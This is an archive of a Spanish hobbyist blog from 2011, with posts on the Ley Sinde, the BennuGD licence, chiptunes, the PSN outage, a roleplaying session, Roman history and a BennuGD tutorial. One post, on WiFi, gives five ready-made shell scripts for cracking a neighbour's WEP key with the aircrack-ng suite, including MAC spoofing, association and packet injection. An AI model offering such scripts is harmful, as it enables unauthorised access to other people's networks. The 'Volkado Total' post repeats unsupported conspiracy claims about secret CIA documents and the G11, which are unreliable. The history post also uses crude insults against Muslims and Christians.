martes, 7 de junio de 2011

El manual de desobediencia a la ley Sinde (scargas)

El colectivo Hacktivistas presentó "el manual de desobediencia a la ley Sinde". Aquí encontrareis como se hacem neduabte cibsehis destbadis a ayudar a los internautas y a evitar las dictatoriales barreras de la censura gubernamental.





Estos consejos estan dirigidos tanto a los usuarios como a los webmasters. Razones para cambiar la configuracion DNS en distintos sistemas operativos, configuracion proxy ademas de donde alojar o registrar dominios.

Según explicó 'Charlie', uno de los miembros de Hacktivistas que participaron en la presentación, la conocida como Ley Sinde "va a ser una ley inútil". Sin embargo, también avisa que, a pesar de ello, tiene un "efecto perverso" como es "la censura". "El principal problema", explica, "es que crea un mecanismo que se salta a los jueces. Abre la puerta a que no haya una igualdad ante la ley".

El Manual de desobediencia a la Ley Sinde puede comprarse en la librería Traficantes de Sueños o descargarse de forma gratuita desde su página web.

Fuente: http://traficantes.net/index.php/editorial/catalogo/otras/Manual-de-desobediencia-a-la-Ley-Sinde

lunes, 16 de mayo de 2011

Historias curiosas de la historia: Hitler y el Nobel de la paz.

Hoy os vengo a contar una historia que demuestra el maravilloso sentido del humor que tiene el ser humano. Adolph Hitler (espero no tener que explicaros quién fue) fue nominado al Premio Nobel de la Paz. Uno pensaría que fue durante sus inicios como jefe de estado, cuando promovía tratados internacionales.

Pero no. Qué sorpresa me llevé cuando vi el año de su nominación: 1939. Al parecer, su promotor, un diputado en el parlamento sueco, le creyó digno de este premio por un tratado que propuso y el cual, supuestamente, había evitado una gran guerra.

Este tratado, en cuestión, fue ese en el que, entre Alemania, Francia, Rusia e Inglaterra, se repartieron Checoslovaquia sin que este estuviese presente en la reunión.

Ni que decir tiene que se equivocó en cuanto a que había evitado una gran guerra. Años más tarde este mismo personaje intentó eliminar todo rastro de su equivocación. Por desgracia, la fundación Nobel no permite que se borren ni las nominaciones, por lo que esta anécdota perdurará en la historia hasta que un gran holocausto cubra a la humanidad con su sombra.

Un detalle:

The Nomination Database for the Nobel Prize in Peace, 1901-1956
Year: 1939
Number: 9-1

Nominee:
Name: Adolf Hitler
Gender: M
Year, birth: 1889
Year, death: 1945
Profession/Category: Chancellor and Führer of Germany (1933-1945).
City: Berlin
Country: DE (GERMANY)

Motivation: Hitler was the leader of the German Nationalist Socialist Party.


Nominator:
Name: E.G.C. Brandt
Gender: M
Profession/Category: Member of the Swedish parliament
Country: SE (SWEDEN)

Evaluation: No

Comment: The nomination was withdrawn in a letter of February 1, 1939.

miércoles, 11 de mayo de 2011

BennuGD cambia de licencia

Años lleva BennuGD con la licencia GNU-GPL, heredada de su proyecto predecesor Proyecto Fénix. Sin embargo, en los últimos meses ha aparecido una problemática: se quiere hacer videojuegos para iOS, Android, GP2X, Wii, etc... y aunque los ports ya lo permiten en muchos casos, no siempre se puede hacer.

Hay plataformas, como los iPods/iPhones/iPads que requieren que el 100% de su software provenga de la Store oficial, siendo ilegal el uso de software que no provenga de ahi; y resulta que para poder publicar tu programa en la Store de Apple se requiere añadir unas medidas de seguridad anticopia que, debido a su carácter cerrado y privativo, son incompatibles con la licencia GNU-GPL. Ello nos impedía distribuir por la App Store el intérprete de Bennu, y un juego en Bennu sin intérprete, es como un juego en Java sin máquina virtual.

Por ello, los padres de BennuGD (Cebrián, Slainte y SplinterGU) con Josebita (uno de los administradores de la comunidad BennuGD.org) como mediador han decidido cambiar la licencia de BennuGD por una menos restrictiva. A partir de ahora, BennuGD lleva licencia Zlib.


Esta licencia se puede resumir en los siguientes puntos:
  • El producto se te da como está, no hay garantías de que funcione para lo que quieres.
  • No puedes decir que tú creaste BennuGD (salvo que seas SplinterGU, Slainte o Cebrián, entonces puedes decir que hiciste parte). Si usas este software se te agradecerá que pongas un "Hecho con BennuGD" en la documentación, pero no es necesario.
  • Si haces una versión derivada, debes anunciarla como tal, no se te permite decir que eso es BennuGD.
  • No puedes cambiar la licencia.

Este es el texto original de la licencia:
/* zlib.h -- interface of the 'zlib' general purpose compression library
version 1.2.2, October 3rd, 2004
Copyright (C) 1995-2004 Jean-loup Gailly and Mark Adler
This software is provided 'as-is', without any express or implied warranty.
In no event will the authors be held liable for any damages
arising from the use of this software.

Permission is granted to anyone to use this software for any purpose,
including commercial applications, and to alter it and redistribute it
freely, subject to the following restrictions:

1. The origin of this software must not be misrepresented; you must not
claim that you wrote the original software. If you use this software
in a product, an acknowledgment in the product documentation would be appreciated but is not required.

2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software.

3. This notice may not be removed or altered from any source distribution.

Jean-loup Gailly jloup@gzip.org Mark Adler madler@alumni.caltech.edu */

Fuente: http://www.bennugd.org/node/139

lunes, 9 de mayo de 2011

La base, cuando te interesan ordenadores grandes

Estos días, ha aparecido por internet, una nueva web: http://la-base.no-ip.org
Esta web trata de un tema muy poco conocido en el mundo de la informática, los Mainframes.


Los mainframes son ordenadores grandes (muy grandes), con mucha capacidad y potencia, y con muy poca documentación libre en internet. Sobre todo, en cualquier otro idioma que no sea el inglés. La finalidad de esta web es, precisamente, difundir información y documentación sobre estos ordenadores.

Acaba de empezar, pero a medida que su autor vaya aprendiendo sobre el tema, irá añadiendo información.

lunes, 2 de mayo de 2011

Chiptunes, amor por lo retro

Hoy os voy a hablar de un tema que me apasiona y que no mucha gente conoce. Los chiptunes.

¿Qué es un chiptune?
Es música escrita en un formato de sonido donde todos los sonidos sean sintetizados en tiempo real por el chip de sonido de una videoconsola.

La "era de oro" de los chiptunes fue desde mediados de los 1980 hasta principio de los 1990, cuando estos chips eran el único modo de reproducir música en los ordenadores. Este medio dio una gran flexibilidad a los compositores para crear su propios sonidos de "instrumentos", pero como los primeros chips de sonido solo tenían generadores de tonos simples y ruido, también impuso importantes limitaciones ante la complejidad del sonido. Los chiptunes suelen parecer así "ásperos" o "chillones" al oyente corriente. Estos chiptunes están muy relacionados con la música de los videojuegos, compartiendo con estos cultura y origen.

Pero... ¿eso no es cosa del pasado?
Sí y no. Actualmente, apenas se emplea en los videojuegos; pero, aun así, el chiptune sigue teniendo público.
Enlace
En páginas como 8bc o chiptune.com puedes escuchar y descargar canciones pertenecientes a otros temas. Así mismo, por todo internet puedes encontrar tutoriales que te enseñan cómo empezar en este apasionante mundillo.

Y, ¿ya tiene esto alguna utilidad?
No sabría decirte. Yo empleo muchas de estas canciones en mis videojuegos. Además, empleo esos programas con los que hacen canciones chiptunes para hacer los efectos especiales de sonido de mis juegos (disparos, recogidas de objetos, etc...). Pero, aprender y divertirse me parece utilidad suficiente.

viernes, 29 de abril de 2011

PSN está off y nadie sabe por qué

Llevamos una semana sin PSN y, la verdad, las historias que se cuentan día a día son cada vez más impresionantes.

Sí, es cierto, a Sony le han robado la información de 77 millones de cuentas. Pero, decir que no hacen nada (como he leido en algún lugar) no sólo es exagerar, sino que es mentir.

Se va diciendo por ahí que el CFW Rebug es el causante. Por suerte, yo tuve la oportunidad de verlo instalado cuando nadie lo conocía y pude analizar su alcance.

Lo primero, este CFW inicia la consola en modo debug. Esto no significa que tenga permisos de administrador ni nada de eso. Lo que hace, simplemente, es sacar chillones y gritones de datos. En esos datos pueden salir desde variables de juegos, hasta strings de conexión (la verdad es que no miré a fondo esa parte).

Gracias a los datos que iban obteniendo de esa forma, fueron consiguiendo crear aplicaciones que permitiesen jugar a juegos piratas, enchufar periféricos no oficiales, etc...

Pero, podías cojer la ID de otro
Eso es cierto, pero no del todo. Rebug se conectaba a un PSN privado destinado a los betatesters y empresas desarrolladoras. Es por eso que podía descargarse las cosas gratis, etc. Lo de suplantar la ID, lo que hacía era algo tan sencillo, como cambiarse en RAM el nombre. Al parecer, en ese servidor privado se logueaba como él, pero luego se cambiaba la ID en la RAM, y cada vez que solicitaba trofeos y demás, PSN se hacía la picha un lio y se los daba.

Por tanto, era sólo apariencia. En realidad no podía entrar en las cuentas de los demás.

¿Quién ha sido entonces?
Pues mira, no lo sé. Y si lo supiese, sería una información por la que se me podría acusar de cómplice. Mi vida es demasiado triste como para pretender conocer a un genio así. Pero, os voy a dar mi opinión:

Por un lado, está el hecho de que Rebug es la consola en modo Debug. Crea unos logs enormes. Es como un agujero negro de datos, absorve todo lo que puede. En consecuencia, es posible que alguien si lo haya modificado y empleado para atacar Sony. Dudo mucho que el propio creador de este CFW sea consciente de lo bestia que puede llegar a ser su programa en malas manos.

Por otro lado, Microsoft sacó una jugosa oferta justo durante esos días que la gente empezó a no poder jugar:


"Microsoft celebra esta semana el Xbox de las Naciones, con ese motivo Xbox Live estará de forma gratuita para todos aquellos usuarios que tengan suscripción silver. Esta promoción estara vigente desde hoy jueves 21 de abril a las 10:00 hasta el martes 26 de abril a las 00:59."


No sé, amigos. Blanco y en botella...

martes, 19 de abril de 2011

Personaliza tu "Error 404"

Hoy os traigo un truquillo a todos aquellos que tenéis un servidor y no os gusta la página de error genérica. Todo consiste en cambiar el fichero ".htaccess".

Para hacer esto, sólo hay que poner este sencillo código en el fichero:

ErrorDocument 404 "página que queramos mostrar"


Esto redirije el usuario hacia donde le hemos dicho cada vez que sucede un error 404.

Nota importante:
Internet Explorer tiene una "funcionalidad" poco documentada que previene la utilización de cualquier página de error 404 personalizada que sea menor a 512 bytes de largo. Los visitantes son enviados, en cambio, a la página propia de IE, que es genérica y sugiere que utilizen una búsqueda en MSN para buscar la información en internet. Asegúrate que tu página personalizada esté por encima de este límite (algo así como 10 líneas completas de texto y HTML deberían ser suficientes).

lunes, 18 de abril de 2011

Un nuevo aliado

En Frikis en apuros seguimos de noticias; y, si la semana pasada fue la nueva cara del blog, hoy es que tenemos un nuevo aliado en este mundo tan caótico. Si os fijáis, en la barra de webs amigas, tenemos una nueva web amiga: Razi en Japón (también llamada Un friki en Japón). A partir de ahora, si pincháis en esa imagen, iréis directos a ese blog, y en su blog encontraréis un enlace a este.

Pero... ¿de qué trata ese blog para que me interese mirarlo?
Pues este blog, lo escribe una gran persona. Y no es peloteo. Razi (Raul para sus familiares y amigos) vive en Japón (concretamente, en Tokyo) y nos cuenta su día a día con una escritura fluída y cercana.

Su redacción no se puede comparar con un premio nobel de literatura, pero eso no le preocupa. Es más, lo prefiere. Está orgulloso de poder difundir sus vivencias en ese maravilloso y misterioso país, con su lenguaje claramente madrileño y con expresiones que él mismo denomina como "by Razi".

Os interesa mirarlo, porque no sólo cuenta lo que vive día a día, sino cómo lo vive, por qué, etc... En ese blog, se aprende mucho sobre la sociedad japonesa con la que se relaciona, sobre la vida de un estudiante extranjero en esa gran ciudad.

Si quieréis mi opinión: este es un blog altamente recomendable.

lunes, 11 de abril de 2011

Frikis en apuros tiene cara nueva

Todo iba muy bien con el viejo skin de la página, pero al igual que todos cambiamos, frikis en apuros también. De manera que como se dice cuando estamos sentados en la mesa antes de la zampa: "Que aproveche". Espero que el nuevo tema le guste a la gente.

domingo, 10 de abril de 2011

Bocasecaman inaugura blog

Esta semana la iniciamos con una noticia nueva, fresca y, simplemente, genial. Nuestro colaborador Bocasecaman, asíduo lector y escritor nuestro, inaugura blog. Realmente lleva ya unas semanitas con el blog. Poniendo alguna entradita y retocando el diseño, logrando cosas que yo nunca sería capaz de hacer. Pero, ¿qué clase de presentador que soy? No os he puesto ni la url: http://zombiesenmipuerta.blogspot.com/ El blog trata de informática en más de un 99%. No es que no sepa hablar de otra cosa. Pero... no va a hablar de otra cosa. El staff de este blog, y yo en su nombre, le mandamos nuestro apoyo incondicional; así como un agradecimiento por el jamón que nos va a enviar.

lunes, 4 de abril de 2011

Siempre gusta probar cosas nuevas

Hace unos días, estuve en las jornadas frikis de la asociación bilbaína Tarasu y jugué una partida, cuanto menos, diferente. El juego, Dungeons & dragons, es de sobra conocido por todos. Y, de hecho, todos los jugadores sabíamos jugar más o menos bien. Lo diferente comenzó cuando el master (gran Alfonso) nos comentó cómo quería que hiciésemos las fichas y por qué: Las tiradas de características se harían en orden, con 3D6, sin absolútamente ninguna posibilidad de repetir la tirada. La razón de esta forma de rellenar la ficha era que esto nos forzaba a crear personajes que nunca elegiríamos nosotros. Esto provocó que nuestro equipo lo formasen:

  • Un mago, que nació en el campo y que su sueño era ser porquero, al que obligaron a ingresar en la escuela de magia de la cual le expulsaron (Jugador: Kukuruyo). Rasgos a destacar:
    • Inteligencia=9.
    • Bastante feo.
    • Constitución tirando a baja.
    • Era un personaje regularcillo tirando a bajo.

  • Un clerigo que mandaron en una misión larga para mantenerlo lejos del convento (Jugador: Alf (creo)). Rasgos a destacar:
    • Inteligencia media tirando a alta.
    • Poca constitución.
    • Estaba convencido de que los dioses le estaban castigando

  • Una princesa olvidada hasta por su familia por lo vergonzosa que resultaba su presencia. A pesar de ser maravillosamente hermosa, padecía un cierto retraso mental (Jugadora: Daratrix). Rasgos a destacar:
    • Inteligencia=5.
    • Constitución cercana al 10.
    • Una fuerza inmensa.
    • Una belleza de 95 sobre 100.

  • Un guerrero que estaba entre los seres más horrendos en todo el universo (Jugador: Raikiri). Rasgos a destacar:
    • Una apariencia de 3 sobre 100.
    • Una constitución de 8 (creo recordar).
    • Una carisma de 8.

  • Un hechicero muy inteligente, pero que padecía una tendencia aguda hacia el autismo. Su caminar por el mundo se debió a que se distrajo un día que paseaba con sus padres por el monte y nunca supo volver a casa, ya que nunca le preocupó ni el nombre de su pueblo (Jugador: Yawin (usease Yo)). Rasgos a destacar:
    • Nombre: Nizam.
    • Aunque tenía una inteligencia de 17, no le servía de nada, ya que su 5 en sabíduría le hacía un cabeza loca.
    • Constitución=15 y Fuerza =5.
    • Sus dotes mágicas podían equipararse a las de una patata. No en cuanto a poder, que era mucho, sino en cuanto a capacidad para manejarlos. Esta se hizo bien visible casi al final de la partida.
Pero... ¿qué pasó en la partida? La partida nos situa en un castillo desconocido. Los personajes se conocen por haber sido contratados por el señor de dicho castillo para realizar una serie de misiones. Sin embargo, no resultó muy acertado contratarlos. Habían sido enviados a un pueblo cercano llamado Ohr K'oh con un mensaje para el alcalde. Pero, estos le transmitieron el mensaje a una tribu de orcos de la zona; la cual estaba atacando el pueblo mencionado. Es por todo esto por lo que la partida empieza con los personajes siendo reprochados por la mujer del señor. El señor apacigua a su esposa, ya que tiene una tarea para tan selecto grupo: En una aldea costera, a unos 30 minutos a caballo del castillo, una "terrible" piraña está causando molestias entre los vecinos. Nuestros protagonistas deben acudir y atrapar al "peligroso" animal. Para ello, les proporciona un "detallado" mapa: Después de entregar una copia de las instrucciones a cada uno de los personajes, el señor los echa de la sala. Su presencia le resulta molesta, ¡y no es para menos! Alguien se ha dejado su copia de las instrucciones sobre la mesa. Mientras tanto, fuera, se está debatiendo un tema muy importante: nadie sabe por donde ir. Es en ese momento, cuando Nizam se da cuenta de que le falta su copia del mapa. Sin embargo, no le importa. Se lo habrá olvidado en alguna parte. Al final, no se sabe bien cómo, consiguen ponerse en camino y, exceptuando alguna conversación de besugos, el viaje resulta tranquilo. Cuando llegan, encuentran en la playa una barca preparada especialmente para ellos. Tiene los remos ya puestos en su sitio y asegurados con cuerdas, no vaya a ser que se les caiga. Nada más ver la barca la dama tonta, a quien Nizam llama Laton (La tonta del pueblo) se lanza hacia la barca y se pone a remar sin fijarse en que la barca está en la arena y que los remos giran en el aire. Mientras el clérigo y el horrendo guerrero sacan las cañas de pescar y disponen el anzuelo con su cebo, una pareja pasa paseando por la playa. Casi no habían acabado de desaparecer tras una duna, cuando se oye un grito. El clérigo, se lanza tras los gritos con la intención de ayudar mientras deja al guerrero a cargo de los tres lastres. Nizam, que también escucha el grito, decide ir a curiosear, dejando al guerrero con la pesada carga de escuchar las historias del mago porquero; las cuales tratan de lo buen porquero que era. Cuando el clérigo llega, descubre que unos hombres-pez están atacando a la pareja. Sin pensarlo mucho, se lanza al ataque con tan buena fortuna, que uno de los dos hombres pez sale corriendo. Cuando Nizam llega, se encuentra con el clérigo enzarzado en combate, y con una demostración de inteligencia atrae a Laton con la promesa de encontrar diversión. Dicho y hecho. Laton sale corriendo, lo cual provoca que el guerrero y el porquero salgan corriendo tras ella. Laton consigue entrar cuerpo a cuerpo contra el hombre-pez antes de que este mate al clérigo; el cual las estaba pasando canutas ya que, por más que Nizam intentaba atontar al hombre-pez con un hechizo, no estaba consiguiendo ni sacar chispas. Sin embargo, en un acto de ingenio, a Nizam se le ocurre invocar a un monstruo para que pelee por él, mientras el porquero y el horrendo guerrero se lanzan cuerpo a cuerpo contra el enemigo. Pero, parece que Nizam es despistado hasta para los hechizos; ya que, lo que consigue es crear una brecha interdimiensional de la que sale un brazo gigantesco. ¡Está a punto de salir un demonio! Nuestro mago porquero, demostrando que sus rurales conocimientos sirven para todo, explica con todo detalle el origen del demonio, su árbol genealógico y hasta su comida favorita. En esto, el clérigo se arrodilla en el suelo preguntando a su dios qué es lo que ha hecho que sea tan malo para merecerse semejante castigo. ¡Pero no está todo perdido! Nizam, queriendo enmendar su error, anuncia que va a lanzar un proyectil mágico, con la intención de devolver a ese demonio a donde procede. Sin embargo, debido a un error de cálculo, lo que consigue es que estalle su propia cabeza esparciendo sus sesos por media playa. ¿Cómo acaba la historia? Pues, no se sabe. El máster tuvo que interrumpir la partida porque era hora de cenar y luego no hubo ocasión de continuarla. ¿Qué conclusiones saco? Que aunque al principio parece absurdo, llevar un personaje tan gañan, ayuda a comprender la esencia del rol. Que es muy entretenido se un completo inútil (nunca me he reído tanto durante una partida) y que no hace falta un guión superultraelaborado para una partidita de una tarde. Mención especial a Shira que estuvo de espectadora durante toda la partida y se lo pasó incluso mejor que nosotros.

jueves, 31 de marzo de 2011

La verdad detrás del cuadro

Muchos conoceréis este cuadro del veneciano Tiziano donde el emperador Carlos V cabalga heroicamente en la batalla de Mühlberg (24 de abril de 1547) donde se enfrentó al ejercito de Felipe I de Hesse.

Bien, pues este cuadro es pura propaganda ¿por qué? bueno, para empezar aquel día estaba cayendo un chaparrón de tres pares de cojones y Carlos V no iba a caballo ¿la razón? tenía unas hemorroides de cojones y cabalgar era mala idea, el dolor le recorría y lloraba amargamente por él; pero si es cierto que luchó y venció. Pero esta épica y hermosa estampa obra de Tiziano es una mentira, aunque muchos no lo saben y se traguen esta épica estampa.

Aunque no es un personaje histórico que me caiga especialmente bien si le reconozco el valor que tenía, este fue el último rey guerrero que reinó en España, en adelante serían burocratas como el esforzado Felipe II; para haceros una idea, tras la violación de un tratado por parte del rey de Francia (Francisco I) reto a este a combate singular que no quiso aceptar.

miércoles, 30 de marzo de 2011

Cosas que debes saber sobre el WIFI

Introducción
Como bien sabéis, podéis disponer en vuestras casas de conexión wifi. Muy útil para ganar movilidad en vuestra casa, sin tener que estar pegado a un cable de red para tener conexión con Internet.

Todo magia, luces y sonidos en el paradisíaco mundo del wifi hasta que te empiezan a contar que Fulanito se conecta a la red del vecino y tiene Internet. Y tu piensas ..... -"Pero eso le pasa por no tener clave para la conexión wifi"-. Es en ese momento cuando te dicen que ese usuario tenia wifi con contraseña, pero que se la han sacado.

Un escalofrió comienza a recorrer tu cuerpo y piensas. ¿Mi red es segura? ¿Estarán chupando de mi Wifi? ¿Es difícil chupar de la red Wifi de alguien? Con esta entrada para "frikis en apuros" tratare de acercaros esta realidad.

Wifi
Sobre el wifi, como ya sabéis, es un tipo de conexión inalámbrica basada en la norma IEEE 802.11 si no recuerdo mal. En general, el dispositivo al que os conectáis por este medio, en los entornos domésticos suele estar integrado en el router y al conectarnos a el formaremos parte de su red local. Esta seria la idea básica de su funcionamiento.

Una red wifi puede tener o no clave y para ello existe la encriptación del intercambio de datos basado en esa clave. Aquí los sistemas de encriptación que mas os vais a encontrar:
- WEP: Los cifrados de 64 y 128 bits. Pienso que es el tipo de clave mas fácil de hackear.
- WAP y WAP2: Las claves aquí no tienen limite de longitud lo que hace mas difícil su descifrado. El WAP2 es el WAP mejorado, aun mas seguro.

Ahora sabes como viaja la información y porque si no metes la clave no puedes conectarte a una red wifi. Y es que esa clave que metes para conectarte a la red wifi sirve para descifrar la información que intercambias de tu PC con el receptor de la conexión wifi.

Pero bueno, si esto es tan seguro ¿Como se han colado en mi red? ¿O como puedo yo probar la seguridad que tienen las redes wifi de mis vecinos? He intentado simplificar este apartado.

Robar claves en las redes Wifi
Si dispones de un sistema operativo Linux, en mi caso un Ubuntu versión 10.04 , tan solo tendrás que instalar las siguientes aplicaciones y yo te ayudare:

Nota: Si no dispones de un sistema Linux esto no te servirá de nada (también puede hacerse en windows de otra manera, pero no lo recomiendo).

Para realizar estos pasos es conveniente ser superusuario (root).
Primer paso: Instalar el aircrack-ng.

apt-get install aircrack-ng

Nota: Esto debería bastar, si te faltan aplicaciones que mas adelante se mencionaran coméntalo y editare la publicación.

Segundo paso: Hay una serie de comandos, pero he preferido simplificaros este paso y prepararos todo en 5 sencillos scripts:

1. Crea un directorio donde guardaremos los scripts, por ejemplo wifihack y otra llamada capturas dentro de esta para poder usarla posteriormente.

2. Creamos un fichero de texto y lo guardamos como "1_inicializar.sh". Este además de inicializarnos todo lo necesario, nos abrirá una ventana con todas las redes wifi a nuestro alcance, sus encriptaciones, los canales por las que se emiten (CH), sus direcciones MAC y sus bssid.

#Script 1
#Colocar la tarjeta de red para monitorear
airmon-ng start wlan0
#ApaÃño para no tener que reiniciar en el momento del hack
airmon-ng start start mon0
#damos de baja nuestro clone para falsear la dirección mac
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55
ifconfig mon0 up
#Monitoreamos las redes inalámbricas cercanas
airodump-ng mon0

3. Con este otro script comenzaremos a capturar paquetes de esa red y a registrar toda la información en un fichero para su futura desencriptación ;). Le llamaremos "2_captura.sh"

#Script 2 - captura
clear
echo Introduce el canal de la red que se desea atacar
read canal
echo Introduce el nombre donde se guardaran las capturas de los paquetes
read archivo
echo Introduce la direccion MAC de la tarjeta atacada
read macatacada
echo $canal > ultcanal.txt
echo $archivo > ultarchivo.txt
echo $macatacada > ultmac.txt
airodump-ng -c $canal -w capturas/$archivo --bssid $macatacada mon0

4. Con este asociaremos nuestro equipo con el que deseamos atacar. Le llamaremos "3_asociar.sh".

#Script 3 - asociar
#Crear una asociacion entre nuestro PC y el modem atacado
clear
echo Introduce el nombre de la red a la que desea atacar.
read nombrered
macatacada=`cat ultmac.txt`
read macatacada
aireplay-ng -1 0 -e $nombrered -a $macatacada -h 00:11:22:33:44:55 mon0

5. Con este nosotros comenzaremos a inyectar paquetes, de esta manera capturaremos muchos mas paquetes y tardaremos menos en sacarle los paquetes necesarios para descifrar la clave. Le llamaremos "4_inyeccion.sh".

#Script 4 - Inyeccion de paquetes
mac=`cat ultmac.txt`
aireplay-ng -3 -b $mac -h 00:11:22:33:44:55 mon0


6. Finalmente, el fruto de nuestro trabajo, una vez que veas que has capturado 5000 paquetes realiza la primera pruena con este script. Si aun no tienes informacion suficiente para descifrar la clave espera 5000 paquetes mas y vuelve a intentarlo, calcula cuanto te falta para tenerla por completo. Este solo sirve para WEP, para WAP necesitarías usar diccionarios, pero todo es documentarse. Llamemosle "5_desencriptar.sh".

#Script 5 - descifrar
#Descifrar el paquete
nombref=`cat ultarchivo.txt`
aircrack-ng capturas/$nombref-01.cap

o sino, mejor en este caso escribir en la linea de comandos.

aircrack-ng capturas/NOMBRE(tabular para obtener más información y escoger un archivo de extensión cap)

# aircrack-ng (nombre del archivo .cap)*.cap -z Es más rápido pero requiere
más paquetes capturados.
# aircrack-ng (nombre del archivo .cap)*.cap -y Para utilizar fuerza bruta
# aircrack-ng (combre del archivo .cap)*.cap -n 64 Para especificar la longitud de
la clave WEP en bits: 64 para 40-bit WEP; 128 para 104-bit WEP, etc. El valor por
defecto es 128 y en 2wire 64 bits.




Las dos maneras sirven, la que os sea más cómoda.

Una vez creados todos los ficheros, se les asigna permisos de ejecución (chmod) o sino mediante propiedades y los ejecutamos como super usuario en el orden correcto (basandote en el orden numerico de los nombres), cada uno en una terminal diferente y vamos rellenando lo que se nos pide.

Conclusiones
Una vez visto con la facilidad con al que un usuario medio o experto en informática puede descifrar una clave wifi y conectarse a esta pensaras que estas solo ante el peligro y la de FUUUUUUUUUUs que vas a estar deseando de soltar.

Solución para conexiones no deseadas

Como he dicho puede que te sientas solo ante el peligro, pero esto tiene solución. Si en tu red domestica se conectan siempre los mismos equipos generalmente, solo tienes que hacer una lista de sus direcciones MAC e introducirlas en la configuración wifi del router, como únicas MACs con las que se podrán acceder. Es tan solo una solución que a mi parecer es muy sencilla, pero no tiene porque ser la única.

Espero que ahora veas las redes wifi de otra manera ;)

viernes, 25 de marzo de 2011

Save the internet: proyecto Volkado Total

Internet, la red de redes, está avanzando a un ritmo vertiginoso. Pero, ¿en el sentido que debiera? En los últimos años ha alcanzado unas cotas de importancia tan altas que todo aquel con un mínimo poder quiere controlarlo a su favor. Hasta tal punto, que corre un grave riesgo de desaparecer.

Lo sabe bastante gente; pero, la mayoría, impide que se difunda esta idea. Porque quiere que ocurra precisamente eso.



Hoy os vengo a hablar de una nueva plataforma que, creo yo, requiere nuestra atención: Save the internet: proyecto Volkado Total.

Primeramente os pongo un extracto de su manifiesto:



En el 2004 el responsable de la Oficina de Defensa de la Propiedad Intelectual de la Sociedad General de Autores y Editores (SGAE), Pedro Farre, advirtió que si los derechos de Propiedad Intelectual no se protegen, la red de redes desaparecerá porque no tendrá contenidos. El año siguiente, Paul Mockapetris, el inventor de DNS (Domain Name System), consideró que internet llegaría a desaparecer como tal en un plazo de diez años.

Sin embargo, basándonos en los documentos encontrados por Sam Peterson, ex miembro de la CIA y uno de los tapados del anterior gobierno estadounidense, parece que todo va más rápido de lo que muchos esperaban. Según estos documentos, las redes sociales están siendo acechadas por tres cuartas partes del G11, que presionan al resto de gobiernos para aprobar una nueva ley que tiene como propósito acabar con esta clase de webs.

Varias asociaciones de defensa y gestión de derechos de autores también están haciendo lo posible por acabar con Youtube y Spotyfy. De momento ya tienen el apoyo de más de 20 países, entre ellos Japón y Estados Unidos.

Varios buscadores están atravesando una importante crisis y sus directivos se verán obligados a hacerlo público en pocos meses. De momento, y a falta de más opciones, se plantean cobrar una mensualidad a todo aquel que quiera utilizar su buscador y resto de aplicaciones.

Hay muchas posibilidades de que las redes sociales como Facebook, Twitter y Youtube desaparecerán tal y como los conocemos, en el plazo de un año.

Y Francia, España y cada vez más países, implantan nuevas leyes que prometen un
futuro incierto.


¡Salvemos internet!




martes, 22 de marzo de 2011

Aprendiendo historia con Crom: Heliogábalo

Ah, los emperadores romanos; entre ellos encontramos algunos de los hombres más ilustres y respetados de toda la historia de occidente, hombres como Augusto, Claudio, Marco Aurelio o Vespasiano evocan a grandes hombres de Estado, eruditos o militares. Otros como Nerón, Calígula o Cómodo son sinónimo de locura, extravagancia y despilfarro (aunque es curioso que Cómodo fuese recuperado por emperadores posteriores y que su mala fama, merecida en parte, se deba a la literatura y al cine).
Pero luego están aquellos de quienes nos olvidamos, hombres peculiares desconocidos por la mayoría. Heliogábalo o Elagabalus es uno de estos emperadores desconocidos, reinó pocos años (alrededor de 6, es difícil de estimar), murió joven y asesinado en un oscuro complot que buscaba poner al frente del imperio (ya entrando en la brutal crisis del siglo III) a su primo. Toda la historiografía antigua y clásica le ha tenido a caer de un burro, considerándole un nefasto emperador, un decadente amoral que se prostituía y un idiota; personalmente no creo que sea así porque las fuentes que hablan sobre él son abiértamente hostiles y contradictorias (La Historia Augusta, principalmente), de hecho es uno de mis personajes históricos favoritos.
¿Las razones? Principalmente porque el tipo tuvo una vida peculiar y adoraba a piedras; hijo bastardo de Septimio Severo (por tanto hermanastro de su predecesor Caracalla, ese si que era un pieza) y una sacerdotisa siria el bueno de Elagabalus vivió la mayor parte de su vida en la ciudad de Emesa como sacerdote de El-Gabal que los romanos conocieron como Sol Invicto, este dios era una piedra. Cuando fue escogido como Emperador Elagabalus se fue a Roma vistiendo a la siria, exigiendo el trato al que estaba acostumbrado (y que era ajeno a la realidad de la élite romana)y se llevó a su querida piedra dios con él. De paso convirtió el pedrusco en la deidad principal del Imperio sustituyendo a los dioses clásicos, le construyó un templo a la siria en medio de la Ciudad Eterna donde instaló todos los objetos sagrados de la religión romana alrededor del poderoso pedrolo.
Que queréis que os diga, a mi que ver al poderoso imperio romano adorando durante 6 años a una piedra me hace mucha gracia.
"Pues vaya un capullo más anormal" pensaréis, no creo que fuese una idea estúpida. En aquel momento el Imperio estaba en problemas, había una crisis de la religiosidad tradicional (uno de los pilares fundamentales del Estado); Heliogabalo tomó una decisión que Constantino (llamado el Grande, mis dos cojones morenos) imitaría tiempo después: unificar a todo el Imperio bajo una sola religión (y adorar piedras no es tan raro, mirad a los musulmanes, casi lo prefiero a un judío en pañales clavado en la pared) ¿lo hizo torpemente? quizás pero era joven ¿salió adelante la cosa? no, joder, lo mataron y desmontaron su chiringuito para poner al psicópata de Alejandro Severo al mando. Pero fijaros que curioso, cuando lo mataron los romanos se preocuparon de devolver sana y salva la piedra dios a Emesa.
Otra de las peculiaridades de su gobierno fue el peso que tuvieron las mujeres en él, para consternación de los senadores que veían como su tía, madre y abuela asistían al Senado y participaban en él (algo único en la historia de Roma), tomaban decisiones en las distintas oficinas (eran mujeres de Estado, no unas cualesquiera) y en general tuvieron más peso en política que todas las emperatrices o madres de emperador de toda la historia Romana. De hecho, a la muerte de estas (como parte del complot) el Imperio aceleraría su desintegración.
Espero que os haya despertado la curiosidad por este singular personaje, pero por favor no tiréis de Wikipedia o Internet para informaros sobre él, buscad libros de historiadores serios y que tengan menos de 15 años y aprended más cosas de este extraño y único emperador.

miércoles, 16 de marzo de 2011

Tutorial BennuGD "for dummies"

Lección 1º: Pulsadores
Imaginemos una bombilla conectada a un pulsador del timbre de nuestra casa. Para que se encendiese habría que pulsar; pero, al soltar, se apagaria.

begin
set_mode(320,240,32,MODE_WINDOW);
load_fpg("images/graficos.fpg");
luz();
end


process luz()
begin
x = 160;
y = 120;
graph = 1;
loop
if (key(_p))
graph = 2;
else
graph = 1;
end
if (key(_esc))
exit();
end
frame;
end
